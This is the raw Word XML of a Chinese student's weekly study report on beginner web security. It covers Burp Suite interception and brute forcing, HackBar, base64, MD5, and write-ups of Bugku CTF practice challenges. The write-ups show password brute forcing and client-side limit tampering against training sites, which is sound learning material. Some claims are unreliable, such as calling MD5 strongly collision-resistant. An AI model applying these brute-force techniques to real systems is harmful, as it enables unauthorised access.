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B327" w14:textId="77777777" w:rsidR="008F758C" w:rsidRPr="008F758C" w:rsidRDefault="00FD764F" w:rsidP="008F758C">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="008F758C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第十周学习报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47305714" w14:textId="339EF75E" w:rsidR="001873B3" w:rsidRPr="008F758C" w:rsidRDefault="008F758C" w:rsidP="008F758C">
      <w:r w:rsidRPr="008F758C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>叶宇航</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3286EDAF" w14:textId="0F5C4F62" w:rsidR="00FD764F" w:rsidRDefault="00FD764F" w:rsidP="000C0EFE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学习内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635E2E47" w14:textId="4EF73BBE" w:rsidR="00FD764F" w:rsidRPr="00582049" w:rsidRDefault="00582049" w:rsidP="00582049">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00FD764F" w:rsidRPr="00582049">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>get与post传递参数的区别</w:t>
      </w:r>
      <w:r w:rsidRPr="00582049">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B399F3" w14:textId="065F26DA" w:rsidR="00FD764F" w:rsidRDefault="00582049" w:rsidP="000C0EFE">
      <w:r>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidR="00FD764F">
        <w:t>et</w:t>
      </w:r>
      <w:r w:rsidR="00FD764F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主要传递简短内容，可在URL栏直接传递，且操作对用户可见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，故安全性较低</w:t>
      </w:r>
      <w:r w:rsidR="00FD764F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B6F122" w14:textId="11267BA7" w:rsidR="00FD764F" w:rsidRDefault="00FD764F" w:rsidP="000C0EFE">
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ost可以传递</w:t>
      </w:r>
      <w:r w:rsidR="00582049">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更多内容，传递内容不可见。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C627E34" w14:textId="77777777" w:rsidR="00D734DC" w:rsidRPr="00FD764F" w:rsidRDefault="00D734DC" w:rsidP="000C0EFE"/>
    <w:p w14:paraId="47344564" w14:textId="296107F9" w:rsidR="00FD764F" w:rsidRDefault="00582049" w:rsidP="000C0EFE">
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00FD764F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:r w:rsidR="00DB58A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
      <w:r w:rsidR="00FD764F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行基本的抓包改包的操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514B6366" w14:textId="6E16C8E9" w:rsidR="00582049" w:rsidRDefault="00582049" w:rsidP="000C0EFE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改代理服务器端口</w:t>
      </w:r>
      <w:r w:rsidR="00DB58A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并使用burpsuite监听该端口，对网页数据包进行抓取，视情况进行修改并使用repeater功能对服务器发送修改后的数据包并对返回的数据包进行抓取分析。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B269205" w14:textId="77777777" w:rsidR="00D734DC" w:rsidRDefault="00D734DC" w:rsidP="000C0EFE"/>
    <w:p w14:paraId="7428AA7C" w14:textId="7CC2073B" w:rsidR="00DB58A0" w:rsidRDefault="00DB58A0" w:rsidP="000C0EFE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用burpsuite进行爆破。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9C6243" w14:textId="11BCC1EE" w:rsidR="00DB58A0" w:rsidRDefault="00DB58A0" w:rsidP="000C0EFE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于一些简单的密码类问题</w:t>
      </w:r>
      <w:r w:rsidR="004F6A95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者数据包中的关键值尝试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以使用爆破工具</w:t>
      </w:r>
      <w:r w:rsidR="004F6A95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>快速尝试弱密码或其他数据值。</w:t>
      </w:r>
      <w:r w:rsidR="004F6A95">
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="004F6A95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>urpsuite可以便捷地对发出数据包的某些变量进行修改并</w:t>
      </w:r>
      <w:r w:rsidR="009D1A11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送至服务器</w:t>
      </w:r>
      <w:r w:rsidR="004F6A95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11688189" w14:textId="282436A9" w:rsidR="00D734DC" w:rsidRDefault="00D734DC" w:rsidP="000C0EFE"/>
    <w:p w14:paraId="3DFDB13B" w14:textId="4269C997" w:rsidR="00D07C70" w:rsidRDefault="00D07C70" w:rsidP="000C0EFE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D07C70">
        <w:t>Falcon Proxy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插件。快速修改代理服务器端口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BCB8E1" w14:textId="77777777" w:rsidR="00D07C70" w:rsidRPr="00D07C70" w:rsidRDefault="00D07C70" w:rsidP="000C0EFE"/>
    <w:p w14:paraId="5FC89993" w14:textId="6E1F50C0" w:rsidR="00DB58A0" w:rsidRDefault="00DA69A6" w:rsidP="000C0EFE">
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00DB58A0">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DB58A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hackbar插件</w:t>
      </w:r>
      <w:r w:rsidR="004F6A95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A47AD7B" w14:textId="713E0F7A" w:rsidR="00DB58A0" w:rsidRDefault="00DB58A0" w:rsidP="000C0EFE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以便捷地进行简单的get与post传参，同时</w:t>
      </w:r>
      <w:r w:rsidR="009D1A11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了一些简单的注入语句</w:t>
      </w:r>
      <w:r w:rsidR="009D1A11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E4A9B0" w14:textId="77777777" w:rsidR="00D734DC" w:rsidRDefault="00D734DC" w:rsidP="000C0EFE"/>
    <w:p w14:paraId="09BB9932" w14:textId="2942115C" w:rsidR="009D1A11" w:rsidRDefault="00DA69A6" w:rsidP="000C0EFE">
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00B2155C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B2155C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了解base</w:t>
      </w:r>
      <w:r w:rsidR="00B2155C">
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="00B2155C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A10DF82" w14:textId="235688C9" w:rsidR="00B2155C" w:rsidRPr="00DA69A6" w:rsidRDefault="00DA69A6" w:rsidP="000C0EFE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b/>
          <w:bCs/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用在</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA69A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮件发送等通信中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00B2155C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将8个bit一组表示的数据改为6个bit一组表示的数据，不足的部分布0，每两个0用“=”来表示，因此末尾常有“=”。</w:t>
      </w:r>
      <w:r w:rsidR="00B2155C">
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00B2155C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ase</w:t>
      </w:r>
      <w:r w:rsidR="00B2155C">
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="00B2155C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虽然可用于加密，但是可以逆运算，所以并不安全</w:t>
      </w:r>
      <w:r w:rsidR="0023425D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00B2155C" w:rsidRPr="00530DF6">
        <w:rPr>
          <w:rStyle w:val="af"/>
        </w:rPr>
        <w:t>严格来说64不能算是一种加密，只能说是编码转换。使用base64的初衷。是为了方便把含有不可见字符串的信息用可见字符串表示出来，以便复制粘贴。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D64250D" w14:textId="77777777" w:rsidR="00D734DC" w:rsidRPr="00530DF6" w:rsidRDefault="00D734DC" w:rsidP="000C0EFE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="af"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29E0E82A" w14:textId="4744B73D" w:rsidR="00530DF6" w:rsidRPr="00530DF6" w:rsidRDefault="00DA69A6" w:rsidP="00530DF6">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00B2155C" w:rsidRPr="000C0EFE">
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00530DF6">
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>了解</w:t>
      </w:r>
      <w:r w:rsidR="0023425D" w:rsidRPr="000C0EFE">
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>MD5算法</w:t>
      </w:r>
      <w:r w:rsidR="000C0EFE" w:rsidRPr="000C0EFE">
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA69C7E" w14:textId="0D0B9A2E" w:rsidR="00530DF6" w:rsidRDefault="00530DF6" w:rsidP="00530DF6">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>有以下特点：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D734DC">
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>压缩性：任意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>长度的数据算出的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>MD5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>值都是固定的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>容易计算：从原数据计算出MD5值很容易。</w:t>
      </w:r>
      <w:r w:rsidRPr="00530DF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抗修改性：对原数据进行任何改动所得到的MD5值有很大区别。强抗碰撞：已知原数据和其MD5值，想找到一个具有相同MD5值的数据（即伪造数据）是非常困难的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7447F1DC" w14:textId="05EE4EBA" w:rsidR="00A64F72" w:rsidRDefault="00A64F72" w:rsidP="00530DF6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其本质是一种信息摘要算法，加密过程中有信息损失，因此无法对加密结果进行逆运算。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224EE873" w14:textId="77777777" w:rsidR="00D734DC" w:rsidRPr="00530DF6" w:rsidRDefault="00D734DC" w:rsidP="00530DF6"/>
    <w:p w14:paraId="400F690D" w14:textId="6F0EE3B2" w:rsidR="00530DF6" w:rsidRDefault="00DA69A6" w:rsidP="00530DF6">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00A64F72">
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A64F72">
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>初步认识 linux系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22210211" w14:textId="3DAE3087" w:rsidR="00A64F72" w:rsidRDefault="00A64F72" w:rsidP="00530DF6">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>服务器一般都使用linux系统，因此想要对服务器进行攻击需要更进一步了解linux系统。</w:t>
      </w:r>
      <w:r w:rsidR="00D734DC">
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>（暂未深入学习）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8890DE" w14:textId="382A8F15" w:rsidR="00D734DC" w:rsidRDefault="00D734DC" w:rsidP="00530DF6">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A503DD2" w14:textId="43604781" w:rsidR="00D734DC" w:rsidRPr="00D734DC" w:rsidRDefault="00D734DC" w:rsidP="00D734DC">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00D734DC">
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>作业内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354B3E0B" w14:textId="5CA9AE21" w:rsidR="00D734DC" w:rsidRDefault="00DA69A6" w:rsidP="00DA69A6">
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00D07C70">
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00D734DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ugkuctf</w:t>
      </w:r>
      <w:r w:rsidR="00D07C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r w:rsidR="00D734DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你必须让他停下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE6BC86" w14:textId="595C8FA3" w:rsidR="00D734DC" w:rsidRDefault="00D734DC" w:rsidP="00DA69A6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网页设置了自动刷新，且是在多个相似网页之间进行跳转，题目提示了在图片出现时会有flag，因此只要在网页刷新至图片时</w:t>
      </w:r>
      <w:r w:rsidR="00D07C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行数据抓取即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFF3AF4" w14:textId="394FFCE5" w:rsidR="00D07C70" w:rsidRDefault="00D07C70" w:rsidP="00D734DC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法1：对发送的数据包进行拦截发至bp中的repeater，反复向服务器发送数据包，直至发现返回数据包中含有flag。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA5B023" w14:textId="01ABC07C" w:rsidR="00D07C70" w:rsidRDefault="00D07C70" w:rsidP="00D734DC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法2：进入源代码网页，反复刷新直至发现flag。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35040AB2" w14:textId="77777777" w:rsidR="005162FF" w:rsidRDefault="005162FF" w:rsidP="00D734DC"/>
    <w:p w14:paraId="7ABA7B05" w14:textId="2E304BD4" w:rsidR="00DA69A6" w:rsidRDefault="00DA69A6" w:rsidP="00DA69A6">
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00D07C70">
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00D07C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ugkuctf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>——头等舱。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A97C760" w14:textId="771B2A9A" w:rsidR="00D07C70" w:rsidRDefault="00DA69A6" w:rsidP="00D734DC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据题目提示，flag可以在返回数据包的头文件中，故在刷新网页时进行抓包，送至repeater发送给服务器，观察返回数据宝头文件即可得到flag。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683E41EA" w14:textId="77777777" w:rsidR="005162FF" w:rsidRDefault="005162FF" w:rsidP="00D734DC"/>
    <w:p w14:paraId="2DB5F3DA" w14:textId="6547CB10" w:rsidR="00DA69A6" w:rsidRDefault="00DA69A6" w:rsidP="00414F46">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>bugkuctf——滑稽。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E45FFDB" w14:textId="3773A478" w:rsidR="00DA69A6" w:rsidRDefault="00414F46" w:rsidP="00414F4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直接打开源代码找flag。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A797019" w14:textId="77777777" w:rsidR="005162FF" w:rsidRDefault="005162FF" w:rsidP="00414F46">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C277C70" w14:textId="77777777" w:rsidR="00414F46" w:rsidRDefault="00DA69A6" w:rsidP="00414F46">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>bugkuctf——计算器</w:t>
      </w:r>
      <w:r w:rsidR="00414F46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2AB910" w14:textId="4FCE6D7C" w:rsidR="005A011A" w:rsidRDefault="00414F46" w:rsidP="005A011A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>题目要求将两位数加法的正确结果写入输入框，但是发现输入框输入字符长度最大为1，打开源代码，发现</w:t>
      </w:r>
      <w:r w:rsidR="005A011A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="005A011A" w:rsidRPr="005A011A">
        <w:rPr>
          <w:rStyle w:val="ac"/>
        </w:rPr>
        <w:t>&lt;input type="text" class="input" maxlength="1"/&gt;</w:t>
      </w:r>
      <w:r w:rsidR="005A011A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”语句限制了最大输入长度，故进入检查界面直接修改“maxlength=“2</w:t>
      </w:r>
      <w:r w:rsidR="005A011A">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="005A011A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>””，再输入正确计算结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4B184C" w14:textId="77777777" w:rsidR="005162FF" w:rsidRDefault="005162FF" w:rsidP="005A011A"/>
    <w:p w14:paraId="2B5BDBF1" w14:textId="21A24B2D" w:rsidR="00DA69A6" w:rsidRDefault="005A011A" w:rsidP="005A011A">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00DA69A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00DA69A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>bugkuctf——bp。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEBA197" w14:textId="77777777" w:rsidR="00F320C7" w:rsidRDefault="00F320C7" w:rsidP="00414F46">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据提示“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F320C7">
        <w:rPr>
          <w:rStyle w:val="ac"/>
        </w:rPr>
        <w:t>弱密码top1000？z?????</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“，得知密码应该为以</w:t>
      </w:r>
      <w:r>
        <w:t>z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开头的六位弱密码。先以常见的几个弱口令字典进行爆破，观察服务器response字长length均为9</w:t>
      </w:r>
      <w:r>
        <w:t>08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，再增加字典数量，仍未发现字长不同的response数据包，可能flag未直接包含在返回数据包中，观察response，发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C66B548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>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B456885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var r = {code: 'bugku10000'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C7763B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if(r.code == 'bugku10000'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0F8CF4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      console.log('e');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629F261C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ab/>
        <w:t>document.getElementById('d').innerHTML = "Wrong account or password!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E85E63A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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DE01AF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      console.log('0');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF35C67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      window.location.href = 'success.php?code='+r.code;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2CE6B6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}</w:t>
      </w:r>
    </w:p>
